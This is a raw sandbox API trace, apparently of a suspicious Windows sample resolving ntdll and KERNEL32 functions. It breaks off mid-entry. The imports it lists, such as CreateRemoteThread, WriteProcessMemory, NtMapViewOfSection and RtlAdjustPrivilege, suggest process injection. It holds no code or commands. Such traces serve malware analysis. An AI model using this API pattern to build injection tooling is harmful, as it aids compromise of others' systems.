0xfdc [0077.851] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ntdll.dll", BaseAddress=0x9eda67f928 | out: BaseAddress=0x9eda67f928*=0x7ff8ee380000) returned 0x0 [0077.851] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="NtCreateSection", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee4139e0) returned 0x0 [0077.851] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="NtUnmapViewOfSection", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee4137e0) returned 0x0 [0077.851] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="NtMapViewOfSection", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee4137c0) returned 0x0 [0077.852] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="ZwOpenProcessToken", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee414680) returned 0x0 [0077.852] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="ZwClose", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee413630) returned 0x0 [0077.852] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="ZwQueryInformationToken", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee413750) returned 0x0 [0077.852] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="ZwOpenProcess", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee4137a0) returned 0x0 [0077.852] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="NtQuerySystemInformation", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee4138a0) returned 0x0 [0077.852] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="RtlNtStatusToDosError", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee38f0c0) returned 0x0 [0077.852] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="ZwQueryInformationProcess", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee4136d0) returned 0x0 [0077.852] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="RtlImageDirectoryEntryToData", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee396850) returned 0x0 [0077.852] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="_wcsupr", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee4058a0) returned 0x0 [0077.852] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="_strupr", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee404f60) returned 0x0 [0077.852] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="memmove", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee417e80) returned 0x0 [0077.852] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="bsearch", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee406420) returned 0x0 [0077.852] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="_vsnwprintf", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee405260) returned 0x0 [0077.852] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="_strlwr", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee404e60) returned 0x0 [0077.852] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="atoi", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee4043d0) returned 0x0 [0077.852] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="strstr", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee408bd0) returned 0x0 [0077.852] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="wcscpy", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee409650) returned 0x0 [0077.852] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="ZwQueryKey", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee4136a0) returned 0x0 [0077.852] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="RtlUpcaseUnicodeString", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee3d3170) returned 0x0 [0077.852] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="RtlFreeUnicodeString", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee3a7110) returned 0x0 [0077.852] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="sprintf", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee407fb0) returned 0x0 [0077.852] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="_snprintf", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee404970) returned 0x0 [0077.853] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="memset", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee4181c0) returned 0x0 [0077.853] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="memcpy", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee417e80) returned 0x0 [0077.853] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="strcpy", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee4082f0) returned 0x0 [0077.853] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="RtlAdjustPrivilege", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee3f32a0) returned 0x0 [0077.853] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="mbstowcs", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee4075a0) returned 0x0 [0077.853] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="RtlImageNtHeader", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee396820) returned 0x0 [0077.853] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="memcmp", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee4076a0) returned 0x0 [0077.853] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="__C_specific_handler", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee403f20) returned 0x0 [0077.853] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee380000, Name="__chkstk", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee416290) returned 0x0 [0077.853] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="KERNEL32.dll", BaseAddress=0x9eda67f928 | out: BaseAddress=0x9eda67f928*=0x7ff8ee2d0000) returned 0x0 [0077.853] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="GetLocalTime", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2ee9e0) returned 0x0 [0077.853] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="OpenProcess", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2ea8f0) returned 0x0 [0077.853] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="VirtualQueryEx", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f24a0) returned 0x0 [0077.853] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="CreateRemoteThread", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee3126d0) returned 0x0 [0077.853] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="GetModuleFileNameW", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2eeca0) returned 0x0 [0077.853] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="GetVersion", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f1fd0) returned 0x0 [0077.853] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="SetEndOfFile", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f5ae0) returned 0x0 [0077.853] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="RemoveDirectoryW", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f5ad0) returned 0x0 [0077.853] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="GetTempFileNameA", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f59e0) returned 0x0 [0077.853] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="DeleteCriticalSection", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee3881b0) returned 0x0 [0077.853] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2ebaf0) returned 0x0 [0077.854] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="VirtualProtect", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2ed680) returned 0x0 [0077.854] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="CloseHandle", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f5510) returned 0x0 [0077.854] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="WriteProcessMemory", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2ee710) returned 0x0 [0077.854] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="CreateFileA", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f5760) returned 0x0 [0077.854] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="lstrcmpiA", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2ebb10) returned 0x0 [0077.854] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="GetModuleFileNameA", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f0c70) returned 0x0 [0077.854] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="LoadLibraryA", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f2080) returned 0x0 [0077.854] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="GetCurrentProcess", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2e6580) returned 0x0 [0077.854] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="lstrcmpA", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2edf40) returned 0x0 [0077.854] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="GetModuleHandleA", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2ee6d0) returned 0x0 [0077.854] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="CreateFileMappingA", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2d5bc0) returned 0x0 [0077.854] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="MapViewOfFile", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2ee950) returned 0x0 [0077.854] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="Sleep", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2e8f00) returned 0x0 [0077.854] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="UnmapViewOfFile", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2eecc0) returned 0x0 [0077.854] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="GlobalLock", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2e6230) returned 0x0 [0077.855] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="lstrlenA", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2ebb80) returned 0x0 [0077.855] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="GlobalAlloc", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2eb810) returned 0x0 [0077.855] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="GlobalUnlock", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2e6170) returned 0x0 [0077.855] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="HeapAlloc", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee3aebf0) returned 0x0 [0077.855] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="lstrcpyA", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2eedf0) returned 0x0 [0077.855] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="GetLastError", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2e6060) returned 0x0 [0077.855] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="HeapFree", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2e6050) returned 0x0 [0077.855] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="RemoveDirectoryA", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f5ac0) returned 0x0 [0077.855] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="DeleteFileA", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f5790) returned 0x0 [0077.855] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="lstrcatA", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f0e30) returned 0x0 [0077.855] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="WriteFile", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f5b80) returned 0x0 [0077.855] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="CreateDirectoryA", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f5730) returned 0x0 [0077.855] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="HeapDestroy", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f2e50) returned 0x0 [0077.855] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="HeapCreate", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f0f80) returned 0x0 [0077.855] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="SetEvent", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f56b0) returned 0x0 [0077.855] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="HeapReAlloc", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee3ad8d0) returned 0x0 [0077.855] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="GetTickCount", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2e60a0) returned 0x0 [0077.855] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="FindNextFileW", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f5880) returned 0x0 [0077.855] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="CopyFileW", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f5d70) returned 0x0 [0077.855] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="SetWaitableTimer", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f56c0) returned 0x0 [0077.855] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="LocalAlloc", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2e9310) returned 0x0 [0077.855] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="GetCurrentThread", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2e6470) returned 0x0 [0077.856] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="GetCurrentThreadId", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2e6030) returned 0x0 [0077.856] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="lstrlenW", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2e64b0) returned 0x0 [0077.856] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="GetSystemTimeAsFileTime", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2e9490) returned 0x0 [0077.856] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="CreateEventA", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f5560) returned 0x0 [0077.856] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="GetWindowsDirectoryA", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f41b0) returned 0x0 [0077.856] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="DeleteFileW", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f57a0) returned 0x0 [0077.856] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="CreateDirectoryW", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f5740) returned 0x0 [0077.856] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="CreateWaitableTimerA", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f3870) returned 0x0 [0077.856] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="GetTempPathA", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f5a00) returned 0x0 [0077.856] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="FindFirstFileW", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f5840) returned 0x0 [0077.856] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="LocalFree", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2e9320) returned 0x0 [0077.856] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="TerminateProcess", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f2c00) returned 0x0 [0077.856] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="SuspendThread", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f0d70) returned 0x0 [0077.856] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="WaitForMultipleObjects", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f56e0) returned 0x0 [0077.856] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="ResumeThread", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2ef570) returned 0x0 [0077.856] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="lstrcpyW", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f0a80) returned 0x0 [0077.856] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="FileTimeToSystemTime", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f5bf0) returned 0x0 [0077.856] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="CreateThread", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2ebc20) returned 0x0 [0077.856] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="CreateFileW", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f5770) returned 0x0 [0077.856] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="ResetEvent", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f56a0) returned 0x0 [0077.856] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="SwitchToThread", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2ea960) returned 0x0 [0077.856] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="lstrcatW", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f3830) returned 0x0 [0077.857] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="CreateProcessW", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2edee0) returned 0x0 [0077.857] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="GetFileSize", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f5950) returned 0x0 [0077.857] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="GetFileAttributesW", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f5930) returned 0x0 [0077.857] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="ExpandEnvironmentStringsW", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2ee420) returned 0x0 [0077.857] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="WideCharToMultiByte", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2e6090) returned 0x0 [0077.857] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="LeaveCriticalSection", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee3b4420) returned 0x0 [0077.857] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="SetLastError", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2e6160) returned 0x0 [0077.857] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="EnterCriticalSection", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee3b4ec0) returned 0x0 [0077.857] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="GetComputerNameA", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2ec250) returned 0x0 [0077.857] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="CreateMutexA", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f55a0) returned 0x0 [0077.857] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="OpenWaitableTimerA", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee313a10) returned 0x0 [0077.857] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="OpenMutexA", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2d5e30) returned 0x0 [0077.857] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="GetVolumeInformationA", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f5a20) returned 0x0 [0077.857] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="WaitForSingleObject", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f5700) returned 0x0 [0077.857] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="ReleaseMutex", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2f5680) returned 0x0 [0077.857] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="GetComputerNameW", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: ProcedureAddress=0x9eda67f910*=0x7ff8ee2ec3c0) returned 0x0 [0077.857] LdrGetProcedureAddress (in: BaseAddress=0x7ff8ee2d0000, Name="InitializeCriticalSection", Ordinal=0x0, ProcedureAddress=0x9eda67f910 | out: 